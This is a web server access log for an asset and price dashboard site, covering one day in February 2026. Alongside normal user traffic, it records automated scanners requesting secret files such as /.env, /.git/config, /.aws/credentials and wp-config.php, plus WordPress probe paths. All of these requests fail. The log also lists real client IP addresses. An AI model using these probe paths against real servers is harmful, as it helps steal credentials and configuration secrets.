- GET https asset.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:28:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:03:02:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[16/Feb/2026:03:02:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[16/Feb/2026:03:02:14 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "-" "-" -[16/Feb/2026:03:02:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[16/Feb/2026:03:02:21 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.242] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[16/Feb/2026:03:05:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 216.81.248.168] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 7.1.1; XT1710-02 Build/NDS26.74-36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36" "-" -[16/Feb/2026:05:01:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0" "-" -[16/Feb/2026:05:33:39 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/HEAD" [Client 47.157.161.137] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" "-" -[16/Feb/2026:05:34:00 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 27.79.121.109] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:34:02 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.svn/wc.db" [Client 45.183.2.117] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:05:42:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:05:42:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:05:42:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:05:43:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 2770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:06 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:06 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:06:44:49 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 4156] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:07:16:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 54.162.53.4] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" -[16/Feb/2026:07:16:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 54.162.53.4] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[16/Feb/2026:08:11:46 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[16/Feb/2026:08:11:48 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[16/Feb/2026:08:13:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2" "-" -[16/Feb/2026:08:37:36 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 91.224.92.99] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/ID3/license.txt" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//feed/" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2020/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2021/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" -[16/Feb/2026:08:37:39 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 91.224.92.99] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[16/Feb/2026:09:04:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 16.144.17.106] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" "-" -[16/Feb/2026:09:04:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 16.144.17.106] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36" "-" -[16/Feb/2026:09:57:24 +0000] - - 400 - GET http asset.hanmocnn.co.kr "/" [Client 167.172.221.95] [Length 230] [Gzip -] [Sent-to ] "-" "-" -[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:09:43 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:09:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:10:12:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 13814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:01:07 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3220] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 